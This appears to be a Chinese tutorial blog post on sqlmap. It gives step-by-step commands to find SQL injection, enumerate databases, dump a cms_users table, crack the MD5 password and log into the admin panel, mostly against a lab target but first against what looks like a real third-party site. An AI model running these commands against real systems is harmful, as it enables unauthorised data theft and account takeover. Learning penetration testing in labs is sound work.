Sqlmap的使用方法

2023-11-11

sqlmap是一个非常强大的sql注入检测与辅助工具,但是由于没有图形界面,基本上用起来比较麻烦。我们要了解这些语句。如下:

检查注入点:

sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11

爆所有数据库信息:

sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --dbs

爆当前数据库信息:

sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --current-db

指定库名列出所有表

sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 --tables# 'vhost48330' 为指定数据库名称

指定库名表名列出所有字段

sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin --columns# 'admin' 为指定表名称

指定库名表名字段dump出指定字段

sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin -C ac,id,password --dump# 'ac,id,password' 为指定字段名称


目标地址:http://www.any.com/wcms/show.php?id=33

实验步骤:

 

第一步:打开目标地址,先手工检查一下是否存在注入点。

   http://www.any.com/wcms/show.php?id=33页面正常   http://www.any.com/wcms/show.php?id=33'正常报错

说明存在注入漏洞。下面进行sqlmap注入。
第二步:使用sqlmap判断一下是否存在注入漏洞(主要是看能否返回信息)

python.exe sqlmap/sqlmap.py -u http://www.any.com/wcms/show.php?id=33

图片1.png

第三步:获取数据库信息。

python.exe sqlmap/sqlmap.py -u http://www.any.com/wcms/show.php?id=33 --dbs#获取所有数据库信息


图片2.png

图片3.png

python.exe sqlmap/sqlmap.py -u http://www.any.com/wcms/show.php?id=33 --current-db#获取当前数据库信息

图片4.png

图片5.png

由于靶机环境搭建了不同的网站和应用,用的都是同一个数据库,因此显示的会把整个mysql的所有数据库名都显示出来。目标网站用的是cms这个库。
第四步:指定库名列出所有表

python.exe sqlmap/sqlmap.py -u http://www.any.com/wcms/show.php?id=33 -D cms --tables

图片6.png

图片7.png

进一步获取到了cms库所有的表,我们更关注cms_users这个表。根据经验,这里面存储着后台的管理账号和密码。
第五步:指定库名表名列出所有字段。

python.exe sqlmap/sqlmap.py -u http://www.any.com/wcms/show.php?id=33 -D cms -T cms_users --columns

 

查出了3个字段,password,userid,username。理论上password、和username分别存储着密码和用户名。
第六步:指定库名表名字段列出指定字段

python.exe sqlmap/sqlmap.py -u http://www.any.com/wcms/show.php?id=33 -D cms -T cms_users -C username,password --dump

 

在执行过程中,会需要我们属于选择一下y或者n,默认的是大写选项,默认即可(一直按Enter键即可);主要是sqlmap调用本地字典库进行简单的md5暴力破解。我们最后获取到了用户名和密码,分别是 admin 和123456。
第七步:在后台登陆一下。至于后台的查找,我们可以通过御剑这款专业的后台查找工具,后续实验中会有详细的介绍,这里不再赘述。

http://www.any.com/wcms/admin/login.php

 

输入用户名和密码 admin 123456

登陆成功。

 

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

Sqlmap的使用方法 的相关文章

  • 使用wireshark对HTTPS解密

    最近需要解析HTTPS流量 所以对wireshark的HTTPS解密进行了实测 使用wireshark解密https的方法 方法一 1 在wireshark的首选项中的protocols的tls选项里添加服务器私钥文件 p12文件需要填写密
  • 看完这篇 教你玩转渗透测试靶机vulnhub——BossplayersCTF

    Vulnhub靶机BBossplayersCTF渗透测试详解 Vulnhub靶机介绍 Vulnhub靶机下载 Vulnhub靶机安装 Vulnhub靶机漏洞详解 信息收集 命令执行漏洞 反弹shell suid提权 获取flag Vulnh
  • 全网最详细网络安全学习路线!手都给我码酸了!

    零基础小白 学完掌握可就业 入门到入土的网安学习路线 在各大平台搜的网安学习路线都太粗略了 看不下去了 我把自己报班的系统学习路线 整理拿出来跟大家分享了 本文为纯干货纯文字内容 需要详细学习路线图以及配套资料的同学可留言或者后台踢我免费分
  • upload-labs 第四关-第九关闯关方法

    Pass 04 1 打开靶机 点击查看提示 发现这是一个 htaccess绕过 2 写入一个 htaccess的文件 文件内容如下 3 将文件修改为 htaccess的文件 4 上传文件 5 新建一个文本文档 内容如下 6 将文件类型修改为
  • kali工具的使用

    一 netcat简介与使用 nc的全称为NetCat 它能够建立并接受传输控制协议 TCP 和用户数据报协议 UDP 的连接 Netcat可在这些连接上读写数据 直到连接关闭为止 它可以通过手工或者脚本与应用层的网络应用程序或服务进行交互
  • sqlmap详细使用介绍

    SQLmap介绍 sqlmap是一个自动化的SQL注入工具 其主要功能是扫描 发现并利用给定的URL进行SQL注入 目前支持的数据库有MySql Oracle Access PostageSQL SQL Server IBM DB2 SQL
  • 渗透测试--medium_socnet

    靶机下载地址 https download vulnhub com boredhackerblog medium socnet ova 实验环境 Kali IP 192 168 172 134 靶机 medium socnet 主机发现 a
  • pikachu靶场记录之暴力破解-包括带token的密码猜解

    说明 pikachu是一个免费的php靶场 类似于dvwa 从github下载对应的项目 解压缩并放到phpstudy的www目录下即可 在phpstudy软件中开启apache mysql 访问首页 192 168 10 150 pika
  • sqlilabs—less8

    文章目录 Sqlilabs less8 1 判断注入点 2 爆字段 3 判断数据库 1 判断数据库名长度 2 判断数据库名称 4 判断表 1 有几个表 2 分别判断表长度 3 分别判断表名称 5 判断列 1 判断表中有几个字段 有几列 2
  • SQLi LABS Less-21

    第21关使用POST请求提交参数 对用户名和密码中的特殊字符进行了转译 难度较大 21关的突破口在cookie 用户登录成功后 将用户名进行base64加密后 保存在cookie中 点击提交按钮的时候 会从cookie中获取保存的用户名 使
  • Vulnhub之Me-and-My-Girlfriend

    Vulnhub是一个很好的靶机平台 想看官网点这里 今天学习Me and My Girlfriend 点击这里下载哦 这个比较简单 入门学习 VMware和VirtualBox都可以导入 成功后如图 这里修改连接为NAT模式 然后就开始玩耍
  • 【渗透测试笔记】之【内网渗透——Windows系统散列值获取与防范】

    拓扑图 Windows系统散列值获取 1 通过CS模块获取用户凭证信息 在获取到目标主机权限后 我们可以抓取hash和dump明文密码 这两项功能都需要管理员权限 如果权限不足 先要进行提权操作 抓取密码哈希 右键被控主机 gt Acces
  • 渗透测试——cookie注入

    1 cookie注入原理 Cookie最先是由Netscape 网景 公司提出的 Netscape官方文档中对Cookie的定义是这样的 Cookie是在HTTP协议下 服务器或脚本可以维护客户工作站上信息的一种方式 Cookie的用途非常
  • Fiddler 微信小程序抓图教程(非常详细)从零基础入门到精通,看完这一篇就够了

    前言 本篇文章主要给大家详细讲解如何用Fiddler爬取微信小程序的图片 内容图文并茂 流程非常简单 我们开始吧 目录 一 获取软件并打开 二 点击工具设置相关代理 三 如何抓图 四 答疑 五 总结 一 获取软件并打开 1 通过百度网盘下载
  • sqli-labs靶场Less-7

    备注 虽然从首页进来就知道是dump into outfile 但我还是假设按不知道的流程来一步步尝试 这样才会印象深刻 不然我觉得失去练习的意义了 1 访问首页 Less 7 index php id 1 这里的传参点是id 探测六步 判
  • 内存取证CTF-Memlabs靶场6

    1 挑战说明 我们从情报局收到了这个内存转储 他们说这个证据可能包含黑帮大卫本杰明的一些秘密 这个内存转储是从本周早些时候被 FBI 逮捕的他的一名员工那里获取的 你的工作是通过内存转储 看看你是否能找出一些东西 FBI还表示 大卫通过互联
  • 鸡肋的RDP反制

    更新时间 2023年07月19日09 18 29 为什么叫鸡肋 鸡肋者 食之无肉 弃之有味 你说不能成吧 但是有成功案例 你说成了吧 要求太高 还要看运气的 一句话 对方需要开启磁盘共享 不开启 没办法反制 1 背景介绍 在很多攻防中 蓝队
  • 运维人员必须知道的10个系统进程

    前言 在日常运维工作中 经常会看到一些奇怪的系统进程占用资源比较高 但是又不敢随意的Kill这些进程 而这些系统级的内核进程都是会用中括号括起来的 它们会执行一些系统的辅助功能 如将缓存写入磁盘 无括号的进程都是用户们执行的进程 如java
  • Gobuster工具详解

    目录 Gobuster工具介绍 主要特性 支持模式及全局参数列举 安装 使用 Dir模式 DNS模式 Vhost模式 fuzz模式 TFTP模式 S3 gcs模式 字典 docker运行gobuster Gobuster工具介绍 Gobus
  • 小白入门黑客之渗透测试(超详细)基本流程(内附工具)

    经常会收到小伙伴们这样的私信 为什么我总是挖不到漏洞呢 渗透到底是什么样的流程呢 所以全网最详细的渗透测试流程来了 渗透测试其实就是通过一些手段来找到网站 APP 网络服务 软件 服务器等网络设备和应用的漏洞 告诉管理员有哪些漏洞 怎么填补

随机推荐

  • Windows部署证书颁发服务器

    证书颁发服务器的部署 1 Windows Server 证书是什么 Windows Server 证书是用于保护网络服务器的安全认证的重要工具 它是一种电子文件 由一个受信任的第三方机构 称为证书颁发机构 签发 用于确认网络服务器的身份 2
  • 贺TDSQL喜提286万QPS!本文回顾了它的十年锻造之路

    导读 2017年 在英特尔 腾讯金融分布式数据库TDSQL团队的共同见证下 TDSQL采用英特尔提供的高端平台 跑出了创造历史的最快性能数据 峰值286万QPS 相比于上一代处理器 性能提升了近4倍 是32核 220GB实例的38倍 TDS
  • fileinput组件将文件上传到服务器的路径编写方法以及Tomcat的配置

    1 先配置文件上传时Tomcat的虚拟路径 system file read location http localhost 8080 fileserversavepath 这是访问图片的地址 system file write locat
  • 数据库 数据丢失问题 及解决方案

    什么是数据丢失 两个线程基于同一个查询结果进行修改 后修改的人会将先修改人的修改覆盖掉 让我们先来看这么个小案例 我们给游戏充值100 支付成功后 银行会向游戏服务器发送支付成功信息 有一个订单支付信息表 order 和一个账户信息表 ac
  • RestTemplate的简单使用

    什么是RestTemplate Spring RestTemplate 是 Spring 提供的一种简单便捷的模板类 提供了多种便捷访问远程Http服务的方法 用于访问 Rest 服务的客户端 能够大大提高客户端的编写效率 RestTemp
  • 深度学习之图片转成pkl格式的训练集

    怎么使用python将文件夹下的图片转换pkl格式的训练集 首先需要读取图片和图片所属的类别 主要思路是 1 生成train Thumbs db 2 生成label Thumbs db 3 将train Thumbs db 和label T
  • Python3 爬虫教程 - 新兴网页解析利器 parsel

    1 介绍 parsel 这个库可以对 HTML 和 XML 进行解析 并支持使用 XPath 和 CSS Selector 对内容进行提取和修改 同时它还融合了正则表达式提取的功能 功能灵活而又强大 同时它也是 Python 最流行爬虫框架
  • 基于卷积神经网络CNN的多输入多输出预测,卷积神经网络CNN的回归预测,多变量输入模型。

    清空环境变量 warning off 关闭报警信息 close all 关闭开启的图窗 clear 清空变量 clc 清空命令行 导入数据 res xlsread 数据 xlsx 数据分析 num size 0 8 训练集占数据集比例 ou
  • php如何无水印解析快手,快手短视频无水印解析过程及代码

    重要 本文最后更新于2020 08 22 08 26 13 某些文章具有时效性 若有错误或已失效 请在下方留言或联系代码狗 抖音快手作为目前最大的两大视频平台 使用量是非常大的 看到某些好看的视频想要保存下来但是又有水印改怎么办呢 狗哥已经
  • Python3_MySQL数据库连接 - PyMySQL 驱动

    数据库连接 连接数据库前 请先确认以下事项 您已经创建了数据库 TESTDB 在TESTDB数据库中您已经创建了表 EMPLOYEE EMPLOYEE表字段为 FIRST NAME LAST NAME AGE SEX 和 INCOME 连接
  • 解决 github clone慢

    转载来源 方法1 代理 通常发现在github clone 代码的时候 开了小飞机也很慢 记得输入下面的命令 git config global https proxy sock5 localhost 1080 这样在操作 git 命令时才
  • Sql Server期末复习

    基础概念 数据库管理系统 是位于用户与操作系统之间的一层数据管理软件 数据库系统 由数据库 数据库管理系统 应用程序和数据库管理员组成 即 DBS DB DBMS 应用程序 DBA 数据库系统的三层模式结构 外模式 模式 内模式 模式 也成
  • 非线性控制理论、反馈线性化、系统的逆、逆系统、微分同胚

    反馈线性化方法是非线性系统控制的一个重要研究方向 在状态反馈下 可 以将一个非线性系统完全变换为一个线性系统 在此情况下 线性系统和非线性 系统的控制问题己不再有本质上的差别 状态反馈具有的这种潜力 使得反馈线 性化方法在产生的同时 也就开
  • 温室气体数据记录软件

    温室气体数据记录软件用于记录温室气体分析仪 冷阱系统 阀箱以及采样单元数据的获取及记录 其软件界面如下 在软件操作几面上部是工具栏 可以实现软件的各种操作 工具栏的排布如下所示 最左侧为 连接 工具 用于整体连接所有设备 包括分析仪 冷阱
  • MySQL数分:窗口函数

    什么是窗口函数 窗口函数在和当前行相关的一组表行上执行计算 这相当于一个可以由聚合函数完成的计算类型 但不同于常规的聚合函数 使用的窗口函数不会导致行被分组到一个单一的输出行 行保留其独立的身份 在后台 窗口函数能够访问的不止查询结果的当前
  • html怎么控制文字的行数,HTML – 最大.文字行数;这种方法可靠吗?

    我需要限制一些文本 以便它永远不会超过2行 这是我到目前为止 Here is some long text it just keeps on going and going and going Hello how are you I m f
  • 系统更新服务器 win7,win7 64位 sp1 update故障。进行系统更新则始终保持 “正在检查更新”且 - Microsoft Community...

    大家好 如题 win7 64位机子 一旦进行系统更新则 1始终保持Windows update 正在检查更新 并无限读条 2svchost exe netsvcs 则消耗1 2个g内存 且出现较多硬页错误 gt 70 而造成系统无法使用 已
  • 前端实现水波图动态效果

    来自 https blog csdn net sheng li article details 84347987 侵删
  • 地摊经济大火之后,如何从零开始摆摊创业?

    地摊经济大火之后 如何从零开始摆摊创业 分享一份新人摆摊手册 https gitmind cn app doc c29513265
  • Sqlmap的使用方法

    sqlmap是一个非常强大的sql注入检测与辅助工具 但是由于没有图形界面 基本上用起来比较麻烦 我们要了解这些语句 如下 检查注入点 sqlmap u http ooxx com tw star photo php artist id 1